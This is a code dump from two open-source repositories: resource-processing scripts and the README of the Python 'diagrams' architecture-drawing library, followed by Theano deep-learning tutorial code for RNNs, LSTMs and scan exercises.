cfg.FILE_PREFIXES["k8s"]: if f.startswith(p): f = f[len(p) :] break return f.lower() def cleaner_digitalocean(f): f = f.replace("-32", "") for p in cfg.FILE_PREFIXES["digitalocean"]: if f.startswith(p): f = f[len(p) :] break return f.lower() def cleaner_alibabacloud(f): for p in cfg.FILE_PREFIXES["alibabacloud"]: if f.startswith(p): f = f[len(p) :] break return f.lower() def cleaner_oci(f): f = f.replace(" ", "-") f = f.replace("_", "-") for p in cfg.FILE_PREFIXES["oci"]: if f.startswith(p): f = f[len(p) :] break return f.lower() def cleaner_programming(f): return f.lower() def cleaner_generic(f): return f.lower() def cleaner_saas(f): return f.lower() def cleaner_elastic(f): return f.lower() def cleaner_outscale(f): return f.lower() def cleaner_openstack(f): return f.lower() cleaners = { "onprem": cleaner_onprem, "aws": cleaner_aws, "azure": cleaner_azure, "digitalocean": cleaner_digitalocean, "gcp": cleaner_gcp, "ibm": cleaner_ibm, "firebase": cleaner_firebase, "k8s": cleaner_k8s, "alibabacloud": cleaner_alibabacloud, "oci": cleaner_oci, "programming": cleaner_programming, "saas": cleaner_saas, "elastic": cleaner_elastic, "outscale": 
cleaner_outscale, "generic": cleaner_generic, "openstack": cleaner_openstack, } def clean_png(pvd: str) -> None: """Refine the resources files names.""" def _rename(base: str, png: str): new = cleaners[pvd](png) old_path = os.path.join(base, png) new_path = os.path.join(base, new) os.rename(old_path, new_path) for root, _, files in os.walk(resource_dir(pvd)): pngs = filter(lambda f: f.endswith(".png"), files) [_rename(root, png) for png in pngs] def round_png(pvd: str) -> None: """Round the images.""" def _round(base: str, path: str): path = os.path.join(base, path) subprocess.run([cfg.CMD_ROUND, *cfg.CMD_ROUND_OPTS, path]) for root, _, files in os.walk(resource_dir(pvd)): pngs = filter(lambda f: f.endswith(".png"), files) paths = filter(lambda f: "rounded" not in f, pngs) [_round(root, path) for path in paths] def svg2png(pvd: str) -> None: """Convert the svg into png""" def _convert(base: str, path: str): path = os.path.join(base, path) subprocess.run([cfg.CMD_SVG2PNG, *cfg.CMD_SVG2PNG_OPTS, path]) subprocess.run(["rm", path]) for root, _, files in os.walk(resource_dir(pvd)): svgs = filter(lambda f: f.endswith(".svg"), files) [_convert(root, path) for path in svgs] def svg2png2(pvd: str) -> None: """Convert the svg into png using image magick""" def _convert(base: str, path: str): path_src = os.path.join(base, path) path_dest = path_src.replace(".svg", ".png") subprocess.run([cfg.CMD_SVG2PNG_IM, *cfg.CMD_SVG2PNG_IM_OPTS, path_src, path_dest]) subprocess.run(["rm", path_src]) for root, _, files in os.walk(resource_dir(pvd)): svgs = filter(lambda f: f.endswith(".svg"), files) [_convert(root, path) for path in svgs] # fmt: off commands = { "clean": clean_png, "round": round_png, "svg2png": svg2png, "svg2png2": svg2png2, } # fmt: on if __name__ == "__main__": if len(sys.argv) < 3: print(_usage) sys.exit() cmd = sys.argv[1] pvd = sys.argv[2] if cmd not in commands: sys.exit() if pvd not in cfg.PROVIDERS: sys.exit() commands[cmd](pvd) File: scripts/__init__.py import os from pathlib import Path import config as cfg def base_dir() -> Path: return Path(os.path.abspath(os.path.dirname(__file__))).parent def app_root_dir(pvd: str) -> str: return os.path.join(base_dir(), cfg.DIR_APP_ROOT, pvd) def doc_root_dir() -> str: return os.path.join(base_dir(), cfg.DIR_DOC_ROOT) def resource_dir(pvd: str) -> str: return os.path.join(base_dir(), cfg.DIR_RESOURCE, pvd) def template_dir() -> str: return os.path.join(base_dir(), cfg.DIR_TEMPLATE)
![diagrams logo](assets/img/diagrams.png)

# Diagrams

[![license](https://img.shields.io/badge/license-MIT-blue.svg)](/LICENSE) [![pypi version](https://badge.fury.io/py/diagrams.svg)](https://badge.fury.io/py/diagrams) ![python version](https://img.shields.io/badge/python-%3E%3D%203.6-blue?logo=python) ![Run tests](https://github.com/mingrammer/diagrams/workflows/Run%20tests/badge.svg?branch=master) [![todos](https://badgen.net/https/api.tickgit.com/badgen/github.com/mingrammer/diagrams?label=todos)](https://www.tickgit.com/browse?repo=github.com/mingrammer/diagrams) ![contributors](https://img.shields.io/github/contributors/mingrammer/diagrams)

<a href="https://www.buymeacoffee.com/mingrammer" target="_blank"><img src="https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png" alt="Buy Me A Coffee" style="height: 41px !important;width: 174px !important;box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;" ></a>

**Diagram as Code**.

Diagrams lets you draw the cloud system architecture **in Python code**. It was born for **prototyping** a new system architecture design without any design tools. You can also describe or visualize an existing system architecture. Diagrams currently supports major providers including `AWS`, `Azure`, `GCP`, `Kubernetes`, `Alibaba Cloud`, `Oracle Cloud`, etc. It also supports `On-Premise` nodes, `SaaS`, and major `Programming` frameworks and languages.

**Diagram as Code** also allows you to **track** architecture diagram changes in any **version control** system.

> NOTE: It does not control any actual cloud resources, nor does it generate CloudFormation or Terraform code. It is just for drawing cloud system architecture diagrams.

## Providers

![aws provider](https://img.shields.io/badge/AWS-orange?logo=amazon-aws&color=ff9900) ![azure provider](https://img.shields.io/badge/Azure-orange?logo=microsoft-azure&color=0089d6) ![gcp provider](https://img.shields.io/badge/GCP-orange?logo=google-cloud&color=4285f4) ![ibm provider](https://img.shields.io/badge/IBM-orange?logo=ibm&color=052FAD) ![kubernetes provider](https://img.shields.io/badge/Kubernetes-orange?logo=kubernetes&color=326ce5) ![alibaba cloud provider](https://img.shields.io/badge/AlibabaCloud-orange?logo=alibaba-cloud&color=ff6a00) ![oracle cloud provider](https://img.shields.io/badge/OracleCloud-orange?logo=oracle&color=f80000) ![openstack provider](https://img.shields.io/badge/OpenStack-orange?logo=openstack&color=da1a32) ![firebase provider](https://img.shields.io/badge/Firebase-orange?logo=firebase&color=FFCA28) ![digital ocean provider](https://img.shields.io/badge/DigitalOcean-0080ff?logo=digitalocean&color=0080ff) ![elastic provider](https://img.shields.io/badge/Elastic-orange?logo=elastic&color=005571) ![outscale provider](https://img.shields.io/badge/OutScale-orange?color=5f87bf) ![on premise provider](https://img.shields.io/badge/OnPremise-orange?color=5f87bf) ![generic provider](https://img.shields.io/badge/Generic-orange?color=5f87bf) ![programming provider](https://img.shields.io/badge/Programming-orange?color=5f87bf) ![saas provider](https://img.shields.io/badge/SaaS-orange?color=5f87bf) ![c4 provider](https://img.shields.io/badge/C4-orange?color=5f87bf)

## Getting Started

It requires **Python 3.7** or higher; check your Python version first. It uses [Graphviz](https://www.graphviz.org/) to render the diagram, so you need to [install Graphviz](https://graphviz.gitlab.io/download/) to use **diagrams**.
After installing Graphviz (or if you already have it), install **diagrams**.

> macOS users can install Graphviz via `brew install graphviz` if you're using [Homebrew](https://brew.sh).

```shell
# using pip (pip3)
$ pip install diagrams

# using pipenv
$ pipenv install diagrams

# using poetry
$ poetry add diagrams
```

You can start with the [quick start](https://diagrams.mingrammer.com/docs/getting-started/installation#quick-start); a minimal example is also sketched right after this README. Check out the [guides](https://diagrams.mingrammer.com/docs/guides/diagram) for more details, and you can find the list of all available nodes [here](https://diagrams.mingrammer.com/docs/nodes/aws).

## Examples

| Event Processing | Stateful Architecture | Advanced Web Service |
| ------------------------------------------------------------ | ------------------------------------------------------------ | ------------------------------------------------------------ |
| ![event processing](https://diagrams.mingrammer.com/img/event_processing_diagram.png) | ![stateful architecture](https://diagrams.mingrammer.com/img/stateful_architecture_diagram.png) | ![advanced web service with on-premise](https://diagrams.mingrammer.com/img/advanced_web_service_with_on-premise.png) |

You can find all the examples on the [examples](https://diagrams.mingrammer.com/docs/getting-started/examples) page.

## Contributing

To contribute to diagrams, check out the [contribution guidelines](CONTRIBUTING.md).

> Let me know if you are using diagrams! I'll add you to the showcase page. (I'm working on it!) :)

## Who uses it?

[Apache Airflow](https://github.com/apache/airflow) is the most popular data workflow orchestrator. Airflow uses Diagrams to generate architecture diagrams in its documentation.

[Cloudiscovery](https://github.com/Cloud-Architects/cloudiscovery) helps you analyze resources in your cloud (AWS/GCP/Azure/Alibaba/IBM) account. It uses this Diagrams library to create a diagram of the analyzed cloud resource map, so you can draw your existing cloud infrastructure with Cloudiscovery.

[Airflow Diagrams](https://github.com/feluelle/airflow-diagrams) is an Airflow plugin that aims to easily visualise your Airflow DAGs at the service level from providers like AWS, GCP, Azure, etc. via diagrams.

## Other languages

- If you are familiar with Go, you can use [go-diagrams](https://github.com/blushft/go-diagrams) as well.

## License

[MIT](LICENSE)
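For reference, the quick start linked in the Getting Started section above boils down to something like this minimal sketch. The `EC2`, `RDS`, and `ELB` classes come from the generated `diagrams.aws.*` modules (only the compute module is shown in this excerpt; the network and database modules are assumed to follow the same pattern), and the diagram name and labels are illustrative:

```python
from diagrams import Diagram
from diagrams.aws.compute import EC2
from diagrams.aws.database import RDS
from diagrams.aws.network import ELB

# The output file name is derived from the diagram name ("web_service.png"
# here); show=False keeps the rendered image from opening in a viewer.
with Diagram("Web Service", show=False):
    ELB("lb") >> EC2("web") >> RDS("userdb")
```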
data-science-ipython-notebooks
5b3c00d462c6e9200315afe46d0093948621eb95
File: __init__.py File: deep-learning/theano-tutorial/rnn_tutorial/lstm_text.py import cPickle as pkl import time import numpy import theano from theano import config import theano.tensor as T from theano.tensor.nnet import categorical_crossentropy from fuel.datasets import TextFile from fuel.streams import DataStream from fuel.schemes import ConstantScheme from fuel.transformers import Batch, Padding # These files can be downloaded from # http://www-etud.iro.umontreal.ca/~brakelp/train.txt.gz # http://www-etud.iro.umontreal.ca/~brakelp/dictionary.pkl # don't forget to change the paths and gunzip train.txt.gz TRAIN_FILE = '/u/brakelp/temp/traindata.txt' VAL_FILE = '/u/brakelp/temp/valdata.txt' DICT_FILE = '/u/brakelp/temp/dictionary.pkl' def sequence_categorical_crossentropy(prediction, targets, mask): prediction_flat = prediction.reshape(((prediction.shape[0] * prediction.shape[1]), prediction.shape[2]), ndim=2) targets_flat = targets.flatten() mask_flat = mask.flatten() ce = categorical_crossentropy(prediction_flat, targets_flat) return T.sum(ce * mask_flat) def gauss_weight(ndim_in, ndim_out=None, sd=.005): if ndim_out is None: ndim_out = ndim_in W = numpy.random.randn(ndim_in, ndim_out) * sd return numpy.asarray(W, dtype=config.floatX) class LogisticRegression(object): """Multi-class Logistic Regression Class The logistic regression is fully described by a weight matrix :math:`W` and bias vector :math:`b`. Classification is done by projecting data points onto a set of hyperplanes, the distance to which is used to determine a class membership probability. """ def __init__(self, input, n_in, n_out): """ Initialize the parameters of the logistic regression :type input: theano.tensor.TensorType :param input: symbolic variable that describes the input of the architecture (one minibatch) :type n_in: int :param n_in: number of input units, the dimension of the space in which the datapoints lie :type n_out: int :param n_out: number of output units, the dimension of the space in which the labels lie """ # initialize with 0 the weights W as a matrix of shape (n_in, n_out) self.W = theano.shared(value=numpy.zeros((n_in, n_out), dtype=theano.config.floatX), name='W', borrow=True) # initialize the baises b as a vector of n_out 0s self.b = theano.shared(value=numpy.zeros((n_out,), dtype=theano.config.floatX), name='b', borrow=True) # compute vector of class-membership probabilities in symbolic form energy = T.dot(input, self.W) + self.b energy_exp = T.exp(energy - T.max(energy, 2)[:, :, None]) pmf = energy_exp / energy_exp.sum(2)[:, :, None] self.p_y_given_x = pmf # compute prediction as class whose probability is maximal in # symbolic form self.y_pred = T.argmax(self.p_y_given_x, axis=1) # parameters of the model self.params = [self.W, self.b] def index_dot(indices, w): return w[indices.flatten()] class LstmLayer: def __init__(self, rng, input, mask, n_in, n_h): # Init params self.W_i = theano.shared(gauss_weight(n_in, n_h), 'W_i', borrow=True) self.W_f = theano.shared(gauss_weight(n_in, n_h), 'W_f', borrow=True) self.W_c = theano.shared(gauss_weight(n_in, n_h), 'W_c', borrow=True) self.W_o = theano.shared(gauss_weight(n_in, n_h), 'W_o', borrow=True) self.U_i = theano.shared(gauss_weight(n_h), 'U_i', borrow=True) self.U_f = theano.shared(gauss_weight(n_h), 'U_f', borrow=True) self.U_c = theano.shared(gauss_weight(n_h), 'U_c', borrow=True) self.U_o = theano.shared(gauss_weight(n_h), 'U_o', borrow=True) self.b_i = theano.shared(numpy.zeros((n_h,), dtype=config.floatX), 'b_i', borrow=True) self.b_f = 
theano.shared(numpy.zeros((n_h,), dtype=config.floatX), 'b_f', borrow=True) self.b_c = theano.shared(numpy.zeros((n_h,), dtype=config.floatX), 'b_c', borrow=True) self.b_o = theano.shared(numpy.zeros((n_h,), dtype=config.floatX), 'b_o', borrow=True) self.params = [self.W_i, self.W_f, self.W_c, self.W_o, self.U_i, self.U_f, self.U_c, self.U_o, self.b_i, self.b_f, self.b_c, self.b_o] outputs_info = [T.zeros((input.shape[1], n_h)), T.zeros((input.shape[1], n_h))] rval, updates = theano.scan(self._step, sequences=[mask, input], outputs_info=outputs_info) # self.output is in the format (batchsize, n_h) self.output = rval[0] def _step(self, m_, x_, h_, c_): i_preact = (index_dot(x_, self.W_i) + T.dot(h_, self.U_i) + self.b_i) i = T.nnet.sigmoid(i_preact) f_preact = (index_dot(x_, self.W_f) + T.dot(h_, self.U_f) + self.b_f) f = T.nnet.sigmoid(f_preact) o_preact = (index_dot(x_, self.W_o) + T.dot(h_, self.U_o) + self.b_o) o = T.nnet.sigmoid(o_preact) c_preact = (index_dot(x_, self.W_c) + T.dot(h_, self.U_c) + self.b_c) c = T.tanh(c_preact) c = f * c_ + i * c c = m_[:, None] * c + (1. - m_)[:, None] * c_ h = o * T.tanh(c) h = m_[:, None] * h + (1. - m_)[:, None] * h_ return h, c def train_model(batch_size=100, n_h=50, n_epochs=40): # Load the datasets with Fuel dictionary = pkl.load(open(DICT_FILE, 'r')) dictionary['~'] = len(dictionary) reverse_mapping = dict((j, i) for i, j in dictionary.items()) print("Loading the data") train = TextFile(files=[TRAIN_FILE], dictionary=dictionary, unk_token='~', level='character', preprocess=str.lower, bos_token=None, eos_token=None) train_stream = DataStream.default_stream(train) # organize data in batches and pad shorter sequences with zeros train_stream = Batch(train_stream, iteration_scheme=ConstantScheme(batch_size)) train_stream = Padding(train_stream) # idem dito for the validation text val = TextFile(files=[VAL_FILE], dictionary=dictionary, unk_token='~', level='character', preprocess=str.lower, bos_token=None, eos_token=None) val_stream = DataStream.default_stream(val) # organize data in batches and pad shorter sequences with zeros val_stream = Batch(val_stream, iteration_scheme=ConstantScheme(batch_size)) val_stream = Padding(val_stream) print('Building model') # Set the random number generator' seeds for consistency rng = numpy.random.RandomState(12345) x = T.lmatrix('x') mask = T.matrix('mask') # Construct the LSTM layer recurrent_layer = LstmLayer(rng=rng, input=x, mask=mask, n_in=111, n_h=n_h) logreg_layer = LogisticRegression(input=recurrent_layer.output[:-1], n_in=n_h, n_out=111) cost = sequence_categorical_crossentropy(logreg_layer.p_y_given_x, x[1:], mask[1:]) / batch_size # create a list of all model parameters to be fit by gradient descent params = logreg_layer.params + recurrent_layer.params # create a list of gradients for all model parameters grads = T.grad(cost, params) # update_model is a function that updates the model parameters by # SGD Since this model has many parameters, it would be tedious to # manually create an update rule for each model parameter. We thus # create the updates list by automatically looping over all # (params[i], grads[i]) pairs. learning_rate = 0.1 updates = [ (param_i, param_i - learning_rate * grad_i) for param_i, grad_i in zip(params, grads) ] update_model = theano.function([x, mask], cost, updates=updates) evaluate_model = theano.function([x, mask], cost) # Define and compile a function for generating a sequence step by step. 
x_t = T.iscalar() h_p = T.vector() c_p = T.vector() h_t, c_t = recurrent_layer._step(T.ones(1), x_t, h_p, c_p) energy = T.dot(h_t, logreg_layer.W) + logreg_layer.b energy_exp = T.exp(energy - T.max(energy, 1)[:, None]) output = energy_exp / energy_exp.sum(1)[:, None] single_step = theano.function([x_t, h_p, c_p], [output, h_t, c_t]) start_time = time.clock() iteration = 0 for epoch in range(n_epochs): print 'epoch:', epoch for x_, mask_ in train_stream.get_epoch_iterator(): iteration += 1 cross_entropy = update_model(x_.T, mask_.T) # Generate some text after each 20 minibatches if iteration % 40 == 0: try: prediction = numpy.ones(111, dtype=config.floatX) / 111.0 h_p = numpy.zeros((n_h,), dtype=config.floatX) c_p = numpy.zeros((n_h,), dtype=config.floatX) initial = 'the meaning of life is ' sentence = initial for char in initial: x_t = dictionary[char] prediction, h_p, c_p = single_step(x_t, h_p.flatten(), c_p.flatten()) sample = numpy.random.multinomial(1, prediction.flatten()) for i in range(450): x_t = numpy.argmax(sample) prediction, h_p, c_p = single_step(x_t, h_p.flatten(), c_p.flatten()) sentence += reverse_mapping[x_t] sample = numpy.random.multinomial(1, prediction.flatten()) print 'LSTM: "' + sentence + '"' except ValueError: print 'Something went wrong during sentence generation.' if iteration % 40 == 0: print 'epoch:', epoch, ' minibatch:', iteration val_scores = [] for x_val, mask_val in val_stream.get_epoch_iterator(): val_scores.append(evaluate_model(x_val.T, mask_val.T)) print 'Average validation CE per sentence:', numpy.mean(val_scores) end_time = time.clock() print('Optimization complete.') print('The code ran for %.2fm' % ((end_time - start_time) / 60.)) if __name__ == '__main__': train_model() File: deep-learning/theano-tutorial/rnn_tutorial/synthetic.py import collections import numpy as np def mackey_glass(sample_len=1000, tau=17, seed=None, n_samples = 1): ''' mackey_glass(sample_len=1000, tau=17, seed = None, n_samples = 1) -> input Generate the Mackey Glass time-series. Parameters are: - sample_len: length of the time-series in timesteps. Default is 1000. - tau: delay of the MG - system. Commonly used values are tau=17 (mild chaos) and tau=30 (moderate chaos). Default is 17. - seed: to seed the random generator, can be used to generate the same timeseries at each invocation. - n_samples : number of samples to generate ''' delta_t = 10 history_len = tau * delta_t # Initial conditions for the history of the system timeseries = 1.2 if seed is not None: np.random.seed(seed) samples = [] for _ in range(n_samples): history = collections.deque(1.2 * np.ones(history_len) + 0.2 * \ (np.random.rand(history_len) - 0.5)) # Preallocate the array for the time-series inp = np.zeros((sample_len,1)) for timestep in range(sample_len): for _ in range(delta_t): xtau = history.popleft() history.append(timeseries) timeseries = history[-1] + (0.2 * xtau / (1.0 + xtau ** 10) - \ 0.1 * history[-1]) / delta_t inp[timestep] = timeseries # Squash timeseries through tanh inp = np.tanh(inp - 1) samples.append(inp) return samples def mso(sample_len=1000, n_samples = 1): ''' mso(sample_len=1000, n_samples = 1) -> input Generate the Multiple Sinewave Oscillator time-series, a sum of two sines with incommensurable periods. 
Parameters are: - sample_len: length of the time-series in timesteps - n_samples: number of samples to generate ''' signals = [] for _ in range(n_samples): phase = np.random.rand() x = np.atleast_2d(np.arange(sample_len)).T signals.append(np.sin(0.2 * x + phase) + np.sin(0.311 * x + phase)) return signals def lorentz(sample_len=1000, sigma=10, rho=28, beta=8 / 3, step=0.01): """This function generates a Lorentz time series of length sample_len, with standard parameters sigma, rho and beta. """ x = np.zeros([sample_len]) y = np.zeros([sample_len]) z = np.zeros([sample_len]) # Initial conditions taken from 'Chaos and Time Series Analysis', J. Sprott x[0] = 0; y[0] = -0.01; z[0] = 9; for t in range(sample_len - 1): x[t + 1] = x[t] + sigma * (y[t] - x[t]) * step y[t + 1] = y[t] + (x[t] * (rho - z[t]) - y[t]) * step z[t + 1] = z[t] + (x[t] * y[t] - beta * z[t]) * step x.shape += (1,) y.shape += (1,) z.shape += (1,) return np.concatenate((x, y, z), axis=1) File: deep-learning/theano-tutorial/rnn_tutorial/rnn_precompile.py """This file is only here to speed up the execution of notebooks. It contains a subset of the code defined in simple_rnn.ipynb and lstm_text.ipynb, in particular the code compiling Theano function. Executing this script first will populate the cache of compiled C code, which will make subsequent compilations faster. The use case is to run this script in the background when a demo VM such as the one for NVIDIA's qwikLABS, so that the compilation phase started from the notebooks is faster. """ import numpy import theano import theano.tensor as T from theano import config from theano.tensor.nnet import categorical_crossentropy floatX = theano.config.floatX # simple_rnn.ipynb class SimpleRNN(object): def __init__(self, input_dim, recurrent_dim): w_xh = numpy.random.normal(0, .01, (input_dim, recurrent_dim)) w_hh = numpy.random.normal(0, .02, (recurrent_dim, recurrent_dim)) self.w_xh = theano.shared(numpy.asarray(w_xh, dtype=floatX), name='w_xh') self.w_hh = theano.shared(numpy.asarray(w_hh, dtype=floatX), name='w_hh') self.b_h = theano.shared(numpy.zeros((recurrent_dim,), dtype=floatX), name='b_h') self.parameters = [self.w_xh, self.w_hh, self.b_h] def _step(self, input_t, previous): return T.tanh(T.dot(previous, self.w_hh) + input_t) def __call__(self, x): x_w_xh = T.dot(x, self.w_xh) + self.b_h result, updates = theano.scan(self._step, sequences=[x_w_xh], outputs_info=[T.zeros_like(self.b_h)]) return result w_ho_np = numpy.random.normal(0, .01, (15, 1)) w_ho = theano.shared(numpy.asarray(w_ho_np, dtype=floatX), name='w_ho') b_o = theano.shared(numpy.zeros((1,), dtype=floatX), name='b_o') x = T.matrix('x') my_rnn = SimpleRNN(1, 15) hidden = my_rnn(x) prediction = T.dot(hidden, w_ho) + b_o parameters = my_rnn.parameters + [w_ho, b_o] l2 = sum((p**2).sum() for p in parameters) mse = T.mean((prediction[:-1] - x[1:])**2) cost = mse + .0001 * l2 gradient = T.grad(cost, wrt=parameters) lr = .3 updates = [(par, par - lr * gra) for par, gra in zip(parameters, gradient)] update_model = theano.function([x], cost, updates=updates) get_cost = theano.function([x], mse) predict = theano.function([x], prediction) get_hidden = theano.function([x], hidden) get_gradient = theano.function([x], gradient) predict = theano.function([x], prediction) # Generating sequences x_t = T.vector() h_p = T.vector() preactivation = T.dot(x_t, my_rnn.w_xh) + my_rnn.b_h h_t = my_rnn._step(preactivation, h_p) o_t = T.dot(h_t, w_ho) + b_o single_step = theano.function([x_t, h_p], [o_t, h_t]) # lstm_text.ipynb def 
gauss_weight(rng, ndim_in, ndim_out=None, sd=.005): if ndim_out is None: ndim_out = ndim_in W = rng.randn(ndim_in, ndim_out) * sd return numpy.asarray(W, dtype=config.floatX) def index_dot(indices, w): return w[indices.flatten()] class LstmLayer: def __init__(self, rng, input, mask, n_in, n_h): # Init params self.W_i = theano.shared(gauss_weight(rng, n_in, n_h), 'W_i', borrow=True) self.W_f = theano.shared(gauss_weight(rng, n_in, n_h), 'W_f', borrow=True) self.W_c = theano.shared(gauss_weight(rng, n_in, n_h), 'W_c', borrow=True) self.W_o = theano.shared(gauss_weight(rng, n_in, n_h), 'W_o', borrow=True) self.U_i = theano.shared(gauss_weight(rng, n_h), 'U_i', borrow=True) self.U_f = theano.shared(gauss_weight(rng, n_h), 'U_f', borrow=True) self.U_c = theano.shared(gauss_weight(rng, n_h), 'U_c', borrow=True) self.U_o = theano.shared(gauss_weight(rng, n_h), 'U_o', borrow=True) self.b_i = theano.shared(numpy.zeros((n_h,), dtype=config.floatX), 'b_i', borrow=True) self.b_f = theano.shared(numpy.zeros((n_h,), dtype=config.floatX), 'b_f', borrow=True) self.b_c = theano.shared(numpy.zeros((n_h,), dtype=config.floatX), 'b_c', borrow=True) self.b_o = theano.shared(numpy.zeros((n_h,), dtype=config.floatX), 'b_o', borrow=True) self.params = [self.W_i, self.W_f, self.W_c, self.W_o, self.U_i, self.U_f, self.U_c, self.U_o, self.b_i, self.b_f, self.b_c, self.b_o] outputs_info = [T.zeros((input.shape[1], n_h)), T.zeros((input.shape[1], n_h))] rval, updates = theano.scan(self._step, sequences=[mask, input], outputs_info=outputs_info) # self.output is in the format (length, batchsize, n_h) self.output = rval[0] def _step(self, m_, x_, h_, c_): i_preact = (index_dot(x_, self.W_i) + T.dot(h_, self.U_i) + self.b_i) i = T.nnet.sigmoid(i_preact) f_preact = (index_dot(x_, self.W_f) + T.dot(h_, self.U_f) + self.b_f) f = T.nnet.sigmoid(f_preact) o_preact = (index_dot(x_, self.W_o) + T.dot(h_, self.U_o) + self.b_o) o = T.nnet.sigmoid(o_preact) c_preact = (index_dot(x_, self.W_c) + T.dot(h_, self.U_c) + self.b_c) c = T.tanh(c_preact) c = f * c_ + i * c c = m_[:, None] * c + (1. - m_)[:, None] * c_ h = o * T.tanh(c) h = m_[:, None] * h + (1. 
- m_)[:, None] * h_ return h, c def sequence_categorical_crossentropy(prediction, targets, mask): prediction_flat = prediction.reshape(((prediction.shape[0] * prediction.shape[1]), prediction.shape[2]), ndim=2) targets_flat = targets.flatten() mask_flat = mask.flatten() ce = categorical_crossentropy(prediction_flat, targets_flat) return T.sum(ce * mask_flat) class LogisticRegression(object): def __init__(self, rng, input, n_in, n_out): W = gauss_weight(rng, n_in, n_out) self.W = theano.shared(value=numpy.asarray(W, dtype=theano.config.floatX), name='W', borrow=True) # initialize the biases b as a vector of n_out 0s self.b = theano.shared(value=numpy.zeros((n_out,), dtype=theano.config.floatX), name='b', borrow=True) # compute vector of class-membership probabilities in symbolic form energy = T.dot(input, self.W) + self.b energy_exp = T.exp(energy - T.max(energy, axis=2, keepdims=True)) pmf = energy_exp / energy_exp.sum(axis=2, keepdims=True) self.p_y_given_x = pmf self.params = [self.W, self.b] batch_size = 100 n_h = 50 # The Theano graph # Set the random number generator' seeds for consistency rng = numpy.random.RandomState(12345) x = T.lmatrix('x') mask = T.matrix('mask') # Construct an LSTM layer and a logistic regression layer recurrent_layer = LstmLayer(rng=rng, input=x, mask=mask, n_in=111, n_h=n_h) logreg_layer = LogisticRegression(rng=rng, input=recurrent_layer.output[:-1], n_in=n_h, n_out=111) # define a cost variable to optimize cost = sequence_categorical_crossentropy(logreg_layer.p_y_given_x, x[1:], mask[1:]) / batch_size # create a list of all model parameters to be fit by gradient descent params = logreg_layer.params + recurrent_layer.params # create a list of gradients for all model parameters grads = T.grad(cost, params) learning_rate = 0.1 updates = [ (param_i, param_i - learning_rate * grad_i) for param_i, grad_i in zip(params, grads) ] update_model = theano.function([x, mask], cost, updates=updates) evaluate_model = theano.function([x, mask], cost) # Generating Sequences x_t = T.iscalar() h_p = T.vector() c_p = T.vector() h_t, c_t = recurrent_layer._step(T.ones(1), x_t, h_p, c_p) energy = T.dot(h_t, logreg_layer.W) + logreg_layer.b energy_exp = T.exp(energy - T.max(energy, axis=1, keepdims=True)) output = energy_exp / energy_exp.sum(axis=1, keepdims=True) single_step = theano.function([x_t, h_p, c_p], [output, h_t, c_t]) File: deep-learning/theano-tutorial/scan_tutorial/scan_ex1_solution.py import theano import theano.tensor as T import numpy as np coefficients = T.vector("coefficients") x = T.scalar("x") max_coefficients_supported = 10000 def step(coeff, power, prior_value, free_var): return prior_value + (coeff * (free_var ** power)) # Generate the components of the polynomial full_range = T.arange(max_coefficients_supported) outputs_info = np.zeros((), dtype=theano.config.floatX) components, updates = theano.scan(fn=step, sequences=[coefficients, full_range], outputs_info=outputs_info, non_sequences=x) polynomial = components[-1] calculate_polynomial = theano.function(inputs=[coefficients, x], outputs=polynomial, updates=updates) test_coeff = np.asarray([1, 0, 2], dtype=theano.config.floatX) print(calculate_polynomial(test_coeff, 3)) File: deep-learning/theano-tutorial/scan_tutorial/scan_ex2_solution.py import theano import theano.tensor as T import numpy as np probabilities = T.vector() nb_samples = T.iscalar() rng = T.shared_randomstreams.RandomStreams(1234) def sample_from_pvect(pvect): """ Provided utility function: given a symbolic vector of probabilities (which 
MUST sum to 1), sample one element and return its index. """ onehot_sample = rng.multinomial(n=1, pvals=pvect) sample = onehot_sample.argmax() return sample def set_p_to_zero(pvect, i): """ Provided utility function: given a symbolic vector of probabilities and an index 'i', set the probability of the i-th element to 0 and renormalize the probabilities so they sum to 1. """ new_pvect = T.set_subtensor(pvect[i], 0.) new_pvect = new_pvect / new_pvect.sum() return new_pvect def step(p): sample = sample_from_pvect(p) new_p = set_p_to_zero(p, sample) return new_p, sample output, updates = theano.scan(fn=step, outputs_info=[probabilities, None], n_steps=nb_samples) modified_probabilities, samples = output f = theano.function(inputs=[probabilities, nb_samples], outputs=[samples], updates=updates) # Testing the function test_probs = np.asarray([0.6, 0.3, 0.1], dtype=theano.config.floatX) for i in range(10): print(f(test_probs, 2)) File: deep-learning/theano-tutorial/intro_theano/utils.py """ This file contains different utility functions that are not connected in anyway to the networks presented in the tutorials, but rather help in processing the outputs into a more understandable way. For example ``tile_raster_images`` helps in generating a easy to grasp image from a set of samples or weights. """ import numpy from six.moves import xrange def scale_to_unit_interval(ndar, eps=1e-8): """ Scales all values in the ndarray ndar to be between 0 and 1 """ ndar = ndar.copy() ndar -= ndar.min() ndar *= 1.0 / (ndar.max() + eps) return ndar def tile_raster_images(X, img_shape, tile_shape, tile_spacing=(0, 0), scale_rows_to_unit_interval=True, output_pixel_vals=True): """ Transform an array with one flattened image per row, into an array in which images are reshaped and layed out like tiles on a floor. This function is useful for visualizing datasets whose rows are images, and also columns of matrices for transforming those rows (such as the first layer of a neural net). :type X: a 2-D ndarray or a tuple of 4 channels, elements of which can be 2-D ndarrays or None; :param X: a 2-D array in which every row is a flattened image. :type img_shape: tuple; (height, width) :param img_shape: the original shape of each image :type tile_shape: tuple; (rows, cols) :param tile_shape: the number of images to tile (rows, cols) :param output_pixel_vals: if output should be pixel values (i.e. int8 values) or floats :param scale_rows_to_unit_interval: if the values need to be scaled before being plotted to [0,1] or not :returns: array suitable for viewing as an image. (See:`Image.fromarray`.) :rtype: a 2-d array with same dtype as X. """ assert len(img_shape) == 2 assert len(tile_shape) == 2 assert len(tile_spacing) == 2 # The expression below can be re-written in a more C style as # follows : # # out_shape = [0,0] # out_shape[0] = (img_shape[0]+tile_spacing[0])*tile_shape[0] - # tile_spacing[0] # out_shape[1] = (img_shape[1]+tile_spacing[1])*tile_shape[1] - # tile_spacing[1] out_shape = [ (ishp + tsp) * tshp - tsp for ishp, tshp, tsp in zip(img_shape, tile_shape, tile_spacing) ] if isinstance(X, tuple): assert len(X) == 4 # Create an output numpy ndarray to store the image if output_pixel_vals: out_array = numpy.zeros((out_shape[0], out_shape[1], 4), dtype='uint8') else: out_array = numpy.zeros((out_shape[0], out_shape[1], 4), dtype=X.dtype) #colors default to 0, alpha defaults to 1 (opaque) if output_pixel_vals: channel_defaults = [0, 0, 0, 255] else: channel_defaults = [0., 0., 0., 1.] 
